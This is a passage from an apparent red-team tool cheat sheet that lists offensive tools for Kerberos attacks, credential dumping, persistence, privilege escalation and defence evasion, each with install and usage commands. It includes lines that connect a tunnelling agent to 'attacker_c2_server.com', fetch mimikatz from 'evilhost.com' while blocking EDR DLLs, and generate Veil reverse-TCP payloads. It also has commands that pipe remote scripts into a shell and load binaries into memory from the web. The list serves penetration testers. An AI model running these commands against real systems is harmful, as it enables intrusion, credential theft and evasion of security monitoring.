ticket attacks **Install: (Download)** You can install the unofficial pre-compiled Rubeus binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe). **Install: (Compile)** Rubeus is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the rubeus [project .sln](https://github.com/GhostPack/Rubeus), choose "Release", and build. **Usage:** ``` Rubeus.exe -h ``` ![image](https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png) ### [🔙](#tool-list)[SharpUp](https://github.com/GhostPack/SharpUp) A nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc. **Install: (Download)** You can install the unofficial pre-compiled SharpUp binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe). **Install: (Compile)** SharpUp is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Open the SharpUp [project .sln](https://github.com/GhostPack/SharpUp), choose "Release", and build. **Usage:** ```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership. SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable. SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership. ``` ![image](https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png) ### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon) MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft. This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the [wiki](https://github.com/skahwah/SQLRecon/wiki). **Install: (Binary)** You can download the latest binary release from [here](https://github.com/skahwah/SQLRecon/releases). **Usage:** ```bash # Authenticating using Windows credentials SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # Authenticating using Local credentials SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami # Authenticating using Azure AD credentials SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami # Run whoami SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # View databases SQLRecon.exe -a Windows -s SQL01 -d master -m databases # View tables SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019 ``` Full usage information can be found on the [wiki](https://github.com/skahwah/SQLRecon/wiki). Tool module usage information can be found [here](https://github.com/skahwah/SQLRecon#usage). ![image](https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png) *Image used from SQLRecon help page* ### [🔙](#tool-list)[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList) This resrouce is a collection of the most common and known techniques to bypass AppLocker. Since AppLocker can be configured in different ways [@api0cradle](https://github.com/api0cradle) maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone. They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs. Indexed Lists - [Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) - [VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md) - [UnverifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md) - [DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) ![image](https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png) *Image used from https://github.com/api0cradle/UltimateAppLockerByPassList* ### [🔙](#tool-list)[StarFighters](https://github.com/Cn33liz/StarFighters) A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host. Both Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe. This might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files. **Usage:** - Setup a new Listener within PowerShell Empire - Use the Launcher command to Generate a PowerShell launcher for this listener - Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file For the JavaScript version use the following Variable: ```javascript var EncodedPayload = "<Paste Encoded Launcher Payload Here>" ``` For the VBScript version use the following Variable: ```vbscript Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>" ``` - Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer. ![image](https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png) *Image used from https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html* ### [🔙](#tool-list)[demiguise](https://github.com/nccgroup/demiguise) The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. Further technical information [here](https://github.com/nccgroup/demiguise#how-does-it-do-it). **Install:** ``` git clone https://github.com/nccgroup/demiguise cd demiguise ``` **Usage:** ```bash # Generate an encrypted .hta file that executes notepad.exe python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta ``` ![image](https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png) *Image used from https://github.com/nccgroup/demiguise* ## [🔙](#tool-list)[PowerZure](https://github.com/hausec/PowerZure) PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources. There is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine. **Install:** ```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1 ``` **Usage:** ```bash # Get a list of AzureAD and Azure objects you have access to Get-AzureTarget ``` [Blog - Attacking Azure, Azure AD, and Introducing PowerZure](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) ![image](https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png) *Image used from https://hakin9.org* Persistence ==================== ### [🔙](#tool-list)[Impacket](https://github.com/fortra/impacket) Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares. It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords. **Install:** ```bash python3 -m pip install impacket ``` **Install: (With Example Scripts)** Download and extract [the package](https://github.com/fortra/impacket), then navigate to the install folder and run... ```bash python3 -m pip install . ``` **Usage:** ```bash # Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # Gets a list of the sessions opened at the remote hosts netview.py domain/user:password -target 192.168.10.2 # Retrieves the MSSQL instances names from the target host. mssqlinstance.py 192.168.1.2 # This script will gather data about the domain's users and their corresponding email addresses. GetADUsers.py domain/user:password@IP ``` Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) for Impacket usage. ![image](https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png) ### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire) Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems. Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system. Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data. **Install:** ```bash git clone https://github.com/EmpireProject/Empire cd Empire sudo ./setup/install.sh ``` **Usage:** ```bash # Start Empire ./empire # List live agents list agents # List live listeners list listeners ``` Nice usage [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) by [HarmJoy](https://github.com/HarmJ0y). ![image](https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png) ### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist) A Windows persistence toolkit written in C#. The project has a [wiki](https://github.com/mandiant/SharPersist/wiki). **Install: (Binary)** You can find the most recent release [here](https://github.com/mandiant/SharPersist/releases). **Install: (Compile)** - Download the project files from the [GitHub Repo](https://github.com/mandiant/SharPersist). - Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings" - Go to "NuGet Package Manager" --> "Package Sources" - Add a package source with the URL "https://api.nuget.org/v3/index.json" - Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019. - `Install-Package Costura.Fody -Version 3.3.3` - Install the TaskScheduler package - `Install-Package TaskScheduler -Version 2.8.11` - You can now build the project yourself! **Usage:** A full list of usage examples can be found [here](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add). ``` #KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add ``` ![image](https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png) ### [🔙](#tool-list)[ligolo-ng](https://github.com/nicocha30/ligolo-ng) Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS). Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using [Gvisor](https://gvisor.dev/). When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network. **Install: (Download)** Precompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/nicocha30/ligolo-ng/releases). **Install: (Build)** *Building ligolo-ng (Go >= 1.17 is required):* ```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go # Build for Windows GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go ``` **Setup: (Linux)** ```bash sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ``` **Setup: (Windows)** You need to download the [Wintun](https://www.wintun.net/) driver (used by [WireGuard](https://www.wireguard.com/)) and place the `wintun.dll` in the same folder as Ligolo (make sure you use the right architecture). **Setup: (Proxy server)** ```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates ``` **Usage:** *Start the agent on your target (victim) computer (no privileges are required!):* ```bash ./agent -connect attacker_c2_server.com:11601 ``` A session should appear on the proxy server. ``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" ``` Use the session command to select the agent. ``` ligolo-ng » session ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 ``` Full usage information can be found [here](https://github.com/nicocha30/ligolo-ng#using-ligolo-ng). ![image](https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png) *Image used from https://github.com/nicocha30/ligolo-ng#demo* Privilege Escalation ==================== ### [🔙](#tool-list)[LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) LinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints. **Install + Usage:** ```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh ``` ![image](https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png) ### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) WinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints. **Install + Usage:** ```bash $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") ``` ![image](https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png) ### [🔙](#tool-list)[linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration) Linux smart enumeration is another good, less verbose, linux privesc tool for Linux. **Install + Usage:** ```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh ``` ![image](https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png) ### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify) Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks. **Key features of Certify:** - Certificate creation - Certificate signing - Certificate import - Certificate trust modification **Install: (Compile)** Certify is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the Certify project [.sln](https://github.com/GhostPack/Certify), choose "Release", and build. **Install: (Running Certify Through PowerShell)** If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly: ```bash [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt ``` Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string): ``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa...")) ``` The Main() method and any arguments can then be invoked as follows: ``` [Certify.Program]::Main("find /vulnerable".Split()) ``` Full compile instructions can be found [here](https://github.com/GhostPack/Certify#compile-instructions). **Usage:** ```bash # See if there are any vulnerable templates Certify.exe find /vulnerable # Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin ``` Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough). ![image](https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png) ### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) Get-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP). Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user. **Install:** Follow the PowerSploit [installation instructions](https://github.com/A-poc/RedTeam-Tools#powersploit) from this tool sheet. ```bash powershell.exe -ep bypass Import-Module PowerSploit ``` **Usage:** ```bash # Get all passwords with additional information Get-GPPPassword # Get list of all passwords Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq ``` ![image](https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png) ### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock) PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. *Supports:* - MS10-015 : User Mode to Ring (KiTrap0D) - MS10-092 : Task Scheduler - MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow - MS13-081 : TrackPopupMenuEx Win32k NULL Page - MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference - MS15-051 : ClientCopyImage Win32k - MS15-078 : Font Driver Buffer Overflow - MS16-016 : 'mrxdav.sys' WebDAV - MS16-032 : Secondary Logon Handle - MS16-034 : Windows Kernel-Mode Drivers EoP - MS16-135 : Win32k Elevation of Privilege - CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc **Install: (PowerShell)** ```bash # Git install git clone https://github.com/rasta-mouse/Sherlock # Load powershell module Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1 ``` **Usage: (PowerShell)** ```bash # Run all functions Find-AllVulns # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference) Find-MS14058 ``` ![image](https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png) *Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/* ### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson) Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities. Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system. **Install:** Using [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the [Watson project .sln](https://github.com/rasta-mouse/Watson), choose "Release", and build. **Usage:** ```bash # Run all checks Watson.exe ``` ![image](https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png) *Image text used from https://github.com/rasta-mouse/Watson#usage* ### [🔙](#tool-list)[ImpulsiveDLLHijack](https://github.com/knight0x07/ImpulsiveDLLHijack) A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries. The discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's. **Install:** - **Procmon.exe** -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon - **Custom Confirmatory DLL's** : - These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path - Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!) - 32Bit dll name should be: maldll32.dll - 64Bit dll name should be: maldll64.dll - Install NuGet Package:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project) **Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.** - **Build and Setup Information:** - **ImpulsiveDLLHijack** - Clone the repository in Visual Studio - Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/ - Build the project! - The ImpulsiveDLLHijack.exe will be inside the bin directory. - **And for Confirmatory DLL's:** - Clone the repository in Visual Studio - Build the project with x86 and x64 - Rename x86 release as maldll32.dll and x64 release as maldll64.dll - **Setup:** Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :)) *Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites* **Usage:** ```bash # Help ImpulsiveDLLHijack.exe -h # Look for vulnerabilities in an executable ImpulsiveDLLHijack.exe -path BINARY_PATH ``` Usage examples can be found [here](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples). ![image](https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png) *Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples* ### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump) A C# tool to dump all sorts of goodies from AD FS. Created by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye. This tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof. **Requirements:** - ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this. - ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now. - ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe. **Install: (Compile)** ADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose "Release", and build. **Usage: (Flags)** ```bash # The Active Directory domain to target. Defaults to the current domain. /domain: # The Domain Controller to target. Defaults to the current DC. /server: # Switch. Toggle to disable outputting the DKM key. /nokey # (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. /database ``` [Blog - Exploring the Golden SAML Attack Against ADFS](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs) ![image](https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png) *Image used from https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs* ### [🔙](#tool-list)[BeRoot](https://github.com/AlessandroZ/BeRoot) BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. The goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment. This project works on Windows, Linux and Mac OS. **Install: (Linux)** ```bash git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/ ``` **Install: (Windows)** A pre-compiled version of BeRoot can be found [here](https://github.com/AlessandroZ/BeRoot/releases). **Usage:** ```bash # Run BeRoot python beroot.py # Run BeRoot with user password (If you know the password use it, you could get more results) python beroot.py --password super_strong_password ``` Further information can be found here for: - [Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux) - [Windows](https://github.com/AlessandroZ/BeRoot/tree/master/Windows) ![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/4c84ffeb-1ffb-474a-b028-4c8fcc64deb6) *Image used from https://github.com/AlessandroZ/BeRoot* Defense Evasion ==================== ### [🔙](#tool-list)[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) A PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts. **Install:** ```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git ``` **Usage:** ```bash ./Invoke-Obfuscation ``` ![image](https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png) ### [🔙](#tool-list)[Veil](https://github.com/Veil-Framework/Veil) Veil is a tool for generating metasploit payloads that bypass common anti-virus solutions. It can be used to generate obfuscated shellcode, see the official [veil framework blog](https://www.veil-framework.com/) for more info. **Install: (Kali)** ```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent ``` **Install: (Git)** ```bash sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent ``` **Usage:** ```bash # List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-payloads # List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-encoders # Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234 ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234 # List all payloads (–list-payloads) for the tool Evasion (-t Evasion) ./Veil.py -t Evasion --list-payloads # Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris ./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris ``` Veil creators wrote a nice [blog post](https://www.veil-framework.com/veil-command-line-usage/) explaining further ordnance and evasion command line usage. ![image](https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png) ### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock) A method of bypassing EDR's active projection DLL's by preventing entry point execution. **Features:** - Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed. - Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime. - Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike). - Implanted process is hidden to help evade scanners looking for hollowed processes. - Command line args are spoofed and implanted after process creation using stealthy EDR detection method. - Patchless ETW bypass. - Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space. **Install:** Use [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) to compile the SharpBlock binary. Open the SharpBlock [project .sln](https://github.com/CCob/SharpBlock), choose "Release", and build. **Usage:** ```bash # Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee # Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi ``` Nice PenTestPartners blog post [here](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/). ![image](https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png) *Image used from https://youtu.be/0W9wkamknfM* ### [🔙](#tool-list)[Alcatraz](https://github.com/weak1337/Alcatraz) Alcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including: - .exe - .dll - .sys Some supported obfuscation features include: - Obfuscation of immediate moves - Control flow flattening - ADD mutation - Entry-point obfuscation - Lea obfuscation **Install: (Requirements)** Install: https://vcpkg.io/en/getting-started.html ```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows ``` **Usage:** Using the GUI to obfuscate a binary: 1. Load a binary by clicking `file` in the top left corner. 2. Add functions by expanding the `Functions` tree. (You can search by putting in the name in the searchbar at the top) 3. Hit `compile` (**Note:** *Obfuscating lots of functions might take some seconds*) ![image](https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png) *Image used from https://github.com/weak1337/Alcatraz* ### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle) Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners. **Install:** The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands: ``` go get github.com/Binject/debug/pe ``` Then build it ``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go ``` **Usage:** ```bash -C string Path to the file containing the certificate you want to clone -I string Path to the orginal file -M Edit the PE file to strip out Go indicators -O string The new file name -S int How many MBs to increase the file by ``` Full usage information can be found [here](https://github.com/optiv/Mangle#usage). ![image](https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png) *Image used from https://github.com/optiv/Mangle* ### [🔙](#tool-list)[AMSI Fail](http://amsi.fail/) AMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. Nice f-secure blog explaining AMSI [here](https://blog.f-secure.com/hunting-for-amsi-bypasses/). ![image](https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png) *Image used from http://amsi.fail/* ### [🔙](#tool-list)[ScareCrow](https://github.com/optiv/ScareCrow) ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. Nice blogs for learning about techniques utilized by ScareCrow: - [Endpoint Detection and Response: How Hackers Have Evolved](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) - [EDR and Blending In: How Attackers Avoid Getting Caught](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught) **Install:** *ScareCrow requires golang 1.16.1 or later to compile loaders.* ```bash # Clone git clone https://github.com/optiv/ScareCrow cd ScareCrow # Install dependencies go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo # Required openssl osslsigncode mingw-w64 # Build go build ScareCrow.go ``` **Usage:** ``` Usage of ./ScareCrow: -I string Path to the raw 64-bit shellcode. -Loader string Sets the type of process that will sideload the malicious payload: [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. ... ``` Full usage information can be found [here](https://github.com/optiv/ScareCrow#loader). ![image](https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png) *Image used 